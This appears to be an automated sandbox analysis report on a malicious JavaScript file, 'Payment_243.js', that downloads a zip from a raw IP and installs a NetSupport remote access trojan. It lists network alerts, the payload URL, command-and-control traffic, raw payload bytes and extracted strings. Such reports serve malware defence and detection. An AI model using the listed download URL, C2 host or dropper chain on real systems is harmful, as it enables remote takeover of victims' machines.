Source: C:\ProgramData\x225qa0\client32.exe	Code function: 6_2_6A13F40B _stat64,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,__wfullpath_helper,_strlen,_IsRootUNCName,GetDriveTypeA,free,___loctotime64_t,free,__wsopen_s,__fstat64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___dtoxmode,GetLastError,__dosmaperr,FindClose,	6_2_6A13F40B
Source: C:\ProgramData\x225qa0\client32.exe	Code function: 6_2_6A13D4FF _findfirst32,_errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_findnext32,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_findfirst64,_errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_findnext64,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,	6_2_6A13D4FF

Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\desktop.ini	Jump to behavior

Software Vulnerabilities

JavaScript source code contains functionality to generate code involving a shell, file or stream

Source: Payment_243.js	Argument value : ['"WScript.Shell"']
Source: Payment_243.js	Argument value : ['"Shell.Application"', '"WScript.Shell"']
Source: Payment_243.js	Argument value : ['"Shell.Application"', '"WScript.Shell"', '"Scripting.FileSystemObject"']
Source: Payment_243.js	Argument value : ['"Shell.Application"', '"WScript.Shell"', '"Scripting.FileSystemObject"']

Source: C:\ProgramData\x225qa0\client32.exe	Code function: 4x nop then add byte ptr [edi], dh		6_2_6A0F8468
Source: C:\ProgramData\x225qa0\client32.exe	Code function: 4x nop then push esi		6_2_6A0EF640

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 1810004 - Severity 1 - Joe Security ANOMALY Microsoft Office HTTP activity : 192.168.2.22:49165 -> 45.155.249.215:80
Source: Network traffic	Suricata IDS: 2827745 - Severity 1 - ETPRO MALWARE NetSupport RAT CnC Activity : 192.168.2.22:49166 -> 185.157.213.71:443

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\System32\wscript.exe

Network Connect: 45.155.249.215 80

Jump to behavior

JavaScript source code contains functionality to generate code involving HTTP requests or file downloads

Source: Payment_243.js	Argument value : ['"GET","http://45.155.249.215/xxx.zip?mt=6364",false']
Source: Payment_243.js	Argument value : ['"GET","http://45.155.249.215/xxx.zip?mt=6364",false']
Source: Payment_243.js	Argument value : ['"MSXML2.XMLHTTP"']
Source: Payment_243.js	Argument value : ['"MSXML2.XMLHTTP"']

Source: global traffic	HTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache

Source: Joe Sandbox View

IP Address: 104.26.0.231 104.26.0.231

Source: Joe Sandbox View	ASN Name: MEER-ASmeerfarbigGmbHCoKGDE MEER-ASmeerfarbigGmbHCoKGDE
Source: Joe Sandbox View	ASN Name: TVHORADADAES TVHORADADAES

Source: global traffic

HTTP traffic detected: GET /xxx.zip?mt=6364 HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 45.155.249.215Connection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 45.155.249.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.155.249.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.155.249.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.155.249.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.155.249.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.155.249.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.155.249.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.155.249.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.155.249.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.155.249.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.155.249.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.155.249.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.155.249.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.155.249.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.155.249.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.155.249.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.155.249.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.155.249.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.155.249.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.155.249.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.155.249.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.155.249.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.155.249.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.155.249.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.155.249.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.155.249.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.155.249.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.155.249.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.155.249.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.155.249.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.155.249.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.155.249.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.155.249.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.155.249.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.155.249.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.155.249.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.155.249.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.155.249.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.155.249.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.155.249.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.155.249.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.155.249.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.155.249.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.155.249.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.155.249.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.155.249.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.155.249.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.155.249.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.155.249.215
Source: unknown	TCP traffic detected without corresponding DNS query: 45.155.249.215

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.24.0 (Ubuntu)Date: Tue, 14 Jan 2025 15:21:08 GMTContent-Type: application/zipContent-Length: 2845498Connection: keep-aliveLast-Modified: Mon, 13 Jan 2025 16:08:22 GMTETag: "2b6b3a-62b98a754cee9"Accept-Ranges: bytesData Raw: 50 4b 03 04 0a 00 00 00 00 00 44 77 2a 5a 00 00 00 00 00 00 00 00 00 00 00 00 08 00 00 00 69 6e 73 74 61 6c 6c 2f 50 4b 03 04 14 00 00 00 08 00 0b 50 29 5a 14 81 51 7e 86 b5 00 00 7c b5 00 00 19 00 00 00 69 6e 73 74 61 6c 6c 2f 35 42 38 46 45 42 32 41 46 38 31 37 34 39 33 45 73 00 05 80 fa 7f 54 44 46 24 51 72 4c 00 00 00 b5 60 88 47 af 1c 6c 35 ca ca 04 4a ee 30 0b ac fc 54 a5 52 80 93 43 4f 67 b0 e8 c6 b3 c1 a1 91 b9 e6 b0 db 7f 3a ed 1f 97 37 3c 2d 12 23 9a 03 a0 82 51 20 90 c6 b0 1d 28 dc 14 8f fa 4d 65 17 fa 2e bd 9a 1b 49 df 54 25 51 81 a0 e5 e3 c9 7d 48 92 3b c0 c1 12 bd 33 4b df 7f 70 4d ec ab 00 6a 2b 1d 0d 4a 4a ac bb 29 9d 51 7e dd e3 78 3f d4 f6 44 c4 65 d3 f9 26 7e c5 a4 cb 66 92 18 15 e3 07 28 f4 6e 21 9f 76 0e 33 83 6f 05 6a f0 f7 f1 25 7b f8 13 9d e3 c3 62 a1 d8 a2 d1 3e 0c 9d 79 11 10 09 de 7a c7 88 00 c4 9b a4 91 db a9 9b 0e 8a 99 90 7a 0d 00 de ac 45 3e 0d 8d a6 e7 f8 f0 48 4a 44 ff 41 c2 5d d2 ff 79 dc 7b 7e 86 77 78 a6 08 5e 55 f9 3c b4 77 ca 4c 83 b5 7e aa c9 6a 16 d5 5b a8 68 3c 3a 02 2c cf 10 8a 62 b0 99 16 dd a8 dd bb 79 62 12 9c 92 85 59 06 be d8 60 59 e3 f2 30 c1 46 aa 00 fa 8f 59 9d eb de 5c 85 0e 15 d1 9b 9d ae fc 46 4a e9 1c 83 15 63 ac 9c 98 84 7b 80 9a 6e 65 9e f5 21 1b e2 38 39 15 d1 e5 5a 05 19 f2 f4 a4 11 8d 61 2a 73 69 9e b5 ee 0a aa a6 c7 bd 0d 5d b3 ca 1b ea 4e a3 4d e1 44 79 3b 52 44 5b ae fe 89 6d 23 3f 0b de 5c e7 20 64 bd 1b c2 8a ba 9f ec e6 f5 77 f7 84 54 d5 b8 50 a8 08 12 60 47 06 93 fe 56 86 a0 71 c2 50 64 89 bf 67 bb fc 20 38 5b 88 08 c7 0a 32 5e 1e 90 7e 34 23 5e e8 a3 82 6b ff 89 53 8a 35 fb a4 e5 7b 7b ca 29 57 c8 32 7f 26 19 ee 50 97 47 31 4c 5e 59 af 27 b7 51 18 d6 74 2f 83 f4 05 7e 23 7e 7a c8 39 a8 05 86 3a 8e cb f4 ed c3 3b 74 95 08 49 f2 c3 03 62 e9 85 67 64 20 e8 1e e2 54 0a 83 0a ba 23 c1 a9 d7 0e f0 3f 41 09 ee d2 7e ef 66 dd 25 b4 d7 55 e3 08 ee 42 cf 2f fa d0 88 a3 9e d4 f5 c1 b8 c4 67 3f 37 64 e9 97 24 b3 29 d3 d6 c7 ad c1 f8 7b 42 85 1e 23 cb 45 19 f4 08 92 34 f7 4e 07 b5 18 8c 3a fb de 13 6d 4d ca 5d 97 4c 44 77 a6 43 cc 41 9b 37 ee ab 7a 8f e9 29 52 e7 71 69 2d c1 b3 6a d9 af 7e 33 45 c2 03 b8 07 65 2b 18 71 32 ad b9 9f 7d 27 f4 7b a5 f9 22 27 80 57 b9 0e 14 08 e0 7b 5d 7c f6 67 4b 0e f2 8a 79 41 db f8 3b b4 78 dc 32 e2 9a 0c 59 e4 cb 78 d4 05 69 50 d8 9d 4a d9 49 8d ba fb 04 5d f9 f4 e1 fe b1 16 d9 dc bf 3b 80 c4 54 4b 81 ff 25 f1 b1 62 14 84 98 7a ee 2b 1f 61 83 bb 90 8b 51 f2 d9 c5 24 f1 84 e6 72 d7 4d 4e 4c b3 d5 c3 40 ac 53 ae 34 3b fe 12 98 61 eb 8d a3 6e ba 4f 6d 3d ad ea 02 82 6f 43 6d 2c 60 6f 86 b3 bc 51 f3 28 14 0c a9 dc f5 ec 26 fd 70 0d 54 f0 59 0b 9c ff df fd 1a bb ae e3 f7 70 ca 84 07 3c 61 e9 23 78 d2 68 51 c8 43 11 4e 22 69 75 88 bd 66 99 cd 41 c6 23 fd ee 43 53 96 34 33 4e 0f ed 74 ad 48 63 67 07

Source: C:\Windows\System32\wscript.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\xxx[1].zip

Jump to behavior

Source: global traffic	HTTP traffic detected: GET /xxx.zip?mt=6364 HTTP/1.1Accept: /UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 45.155.249.215Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache

Source: global traffic

DNS traffic detected: DNS query: geo.netsupportsoftware.com

Source: unknown

HTTP traffic detected: POST http://185.157.213.71/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 22Host: 185.157.213.71Connection: Keep-AliveCMD=POLLINFO=1ACK=1Data Raw: Data Ascii:

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 14 Jan 2025 15:21:19 GMTContent-Type: text/html; charset=us-asciiTransfer-Encoding: chunkedConnection: keep-aliveCF-Ray: 901e9d7529d1c988-IADCF-Cache-Status: DYNAMICcf-apo-via: origin,hostReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Gc3oIBvBtUgM8YAwbRN48w5AsnTbnCGPG4HIQT2ZB6J88m7vBx2lZz2S2l%2BsemwJa2rW0KJwidk18w5jAANvtDPuVpiETPEm4TD0tqhBVYG%2BwMN9jSkP85%2BAMInOnFYS7d7Zi5r4PtBHFeCd"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareserver-timing: cfL4;desc="?proto=TCP&rtt=8080&min_rtt=8080&rtt_var=4040&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=118&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>0
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 14 Jan 2025 15:21:20 GMTContent-Type: text/html; charset=us-asciiTransfer-Encoding: chunkedConnection: keep-aliveCF-Ray: 901e9d7bedff0f37-EWRCF-Cache-Status: DYNAMICcf-apo-via: origin,hostReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Kv9TaLead1UM8xuCNbW5bbNocBjfRxR77Xi1neXV%2FjpNe6%2FpYbFfDPPkOJzct6zd%2FEhAt%2Fm%2FoRe3OIbFNrrYb9Dv7JMdUVy9Sq4tNVR2%2FGE8XIqWXIX7fXyei70qyxJmBXBhkM1TPoBC5NpR"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareserver-timing: cfL4;desc="?proto=TCP&rtt=1482&min_rtt=1482&rtt_var=741&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=118&delivery_rate=0&cwnd=137&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 14 Jan 2025 15:21:20 GMTContent-Type: text/html; charset=us-asciiTransfer-Encoding: chunkedConnection: keep-aliveCF-Ray: 901e9d804f440c92-EWRCF-Cache-Status: DYNAMICcf-apo-via: origin,hostReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3SEZmome8uga32gP%2FZMtXcxpGi%2BtdRASRvM4EkIhhWM%2FwtTuCdV3BPbNrHTGnDFM26lQ2%2FNTNhwt56JEbpbT4xQGDGmlikULEjJMaPDiEbmpk6NnNSw%2FKJWQdpQXzWszGDHhAZs6fqvrFOK%2B"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareserver-timing: cfL4;desc="?proto=TCP&rtt=1528&min_rtt=1528&rtt_var=764&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=118&delivery_rate=0&cwnd=172&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>0

Source: client32.exe, 00000004.00000002.671102639.0000000071610000.00000002.00000001.01000000.0000000D.sdmp, HTCTL32.DLL.0.dr	String found in binary or memory: http://%s/fakeurl.htm
Source: client32.exe, 00000004.00000002.671102639.0000000071610000.00000002.00000001.01000000.0000000D.sdmp, HTCTL32.DLL.0.dr	String found in binary or memory: http://%s/testpage.htm
Source: client32.exe, 00000004.00000002.671102639.0000000071610000.00000002.00000001.01000000.0000000D.sdmp, HTCTL32.DLL.0.dr	String found in binary or memory: http://%s/testpage.htmwininet.dll
Source: Payment_243.js	String found in binary or memory: http://0.30000000000000004.com/
Source: client32.exe, client32.exe, 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmp, client32.exe, 00000006.00000002.530108204.0000000011194000.00000002.00000001.01000000.00000009.sdmp, client32.exe, 00000008.00000002.547693910.0000000011194000.00000002.00000001.01000000.00000009.sdmp, PCICL32.DLL.0.dr	String found in binary or memory: http://127.0.0.1
Source: client32.exe, 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmp, client32.exe, 00000006.00000002.530108204.0000000011194000.00000002.00000001.01000000.00000009.sdmp, client32.exe, 00000008.00000002.547693910.0000000011194000.00000002.00000001.01000000.00000009.sdmp, PCICL32.DLL.0.dr	String found in binary or memory: http://127.0.0.1RESUMEPRINTING
Source: wscript.exe, 00000000.00000003.394805802.0000000006D4E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.394015277.0000000004380000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.394206715.0000000004B20000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.394139946.0000000002E80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://45.155.249.215/xxx.zip?mt=6364
Source: webmvorbisencoder.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: webmvorbisencoder.dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: client32.exe.0.dr	String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: webmvorbisencoder.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: webmvorbisencoder.dll.0.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: webmvorbisencoder.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: webmvorbisencoder.dll.0.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: client32.exe, 00000004.00000002.670510259.00000000004F7000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000006.00000002.530108204.0000000011194000.00000002.00000001.01000000.00000009.sdmp, client32.exe, 00000008.00000002.547693910.0000000011194000.00000002.00000001.01000000.00000009.sdmp, PCICL32.DLL.0.dr	String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.asp
Source: client32.exe, 00000004.00000002.670510259.00000000004F7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.asp&
Source: client32.exe, 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmp, client32.exe, 00000006.00000002.530108204.0000000011194000.00000002.00000001.01000000.00000009.sdmp, client32.exe, 00000008.00000002.547693910.0000000011194000.00000002.00000001.01000000.00000009.sdmp, PCICL32.DLL.0.dr	String found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspSetChannel(%s)
Source: webmvorbisencoder.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: webmvorbisencoder.dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0O
Source: client32.exe.0.dr	String found in binary or memory: http://ocsp.thawte.com0
Source: HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, remcmdstub.exe.0.dr	String found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
Source: HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, remcmdstub.exe.0.dr	String found in binary or memory: http://s2.symcb.com0
Source: HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, remcmdstub.exe.0.dr	String found in binary or memory: http://sv.symcb.com/sv.crl0f
Source: HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, remcmdstub.exe.0.dr	String found in binary or memory: http://sv.symcb.com/sv.crt0
Source: HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, remcmdstub.exe.0.dr	String found in binary or memory: http://sv.symcd.com0&
Source: webmvorbisencoder.dll.0.dr	String found in binary or memory: http://t1.symcb.com/ThawtePCA.crl0
Source: webmvorbisencoder.dll.0.dr	String found in binary or memory: http://t2.symcb.com0
Source: webmvorbisencoder.dll.0.dr	String found in binary or memory: http://tl.symcb.com/tl.crl0
Source: webmvorbisencoder.dll.0.dr	String found in binary or memory: http://tl.symcb.com/tl.crt0
Source: webmvorbisencoder.dll.0.dr	String found in binary or memory: http://tl.symcd.com0&
Source: client32.exe.0.dr	String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: client32.exe.0.dr	String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: client32.exe.0.dr	String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: Payment_243.js	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: webmvorbisencoder.dll.0.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: client32.exe, 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, client32.exe, 00000006.00000002.530116570.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, client32.exe, 00000008.00000002.547708086.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, PCICL32.DLL.0.dr	String found in binary or memory: http://www.netsupportschool.com/tutor-assistant.asp
Source: client32.exe, 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, client32.exe, 00000006.00000002.530116570.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, client32.exe, 00000008.00000002.547708086.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, PCICL32.DLL.0.dr	String found in binary or memory: http://www.netsupportschool.com/tutor-assistant.asp11(L
Source: client32.exe.0.dr	String found in binary or memory: http://www.netsupportsoftware.com
Source: client32.exe, 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, client32.exe, 00000006.00000002.530116570.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, client32.exe, 00000008.00000002.547708086.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, PCICL32.DLL.0.dr	String found in binary or memory: http://www.pci.co.uk/support
Source: client32.exe, 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, client32.exe, 00000006.00000002.530116570.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, client32.exe, 00000008.00000002.547708086.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, PCICL32.DLL.0.dr	String found in binary or memory: http://www.pci.co.uk/supportsupport
Source: HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, remcmdstub.exe.0.dr	String found in binary or memory: http://www.symauth.com/cps0(
Source: HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, remcmdstub.exe.0.dr	String found in binary or memory: http://www.symauth.com/rpa00
Source: HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, remcmdstub.exe.0.dr	String found in binary or memory: https://d.symcb.com/cps0%
Source: HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, remcmdstub.exe.0.dr	String found in binary or memory: https://d.symcb.com/rpa0
Source: Payment_243.js	String found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/API/CanvasRenderingContext2D/globalCompositeOperation
Source: Payment_243.js	String found in binary or memory: https://github.com/d3/d3/blob/9cc9a875e636a1dcf36cc1e07bdf77e1ad6e2c74/src/arrays/quantile.js
Source: Payment_243.js	String found in binary or memory: https://github.com/ecomfe/zrender/blob/master/LICENSE.txt
Source: Payment_243.js	String found in binary or memory: https://jsbench.me/2vkpcekkvw/1)
Source: Payment_243.js	String found in binary or memory: https://momentjs.com/
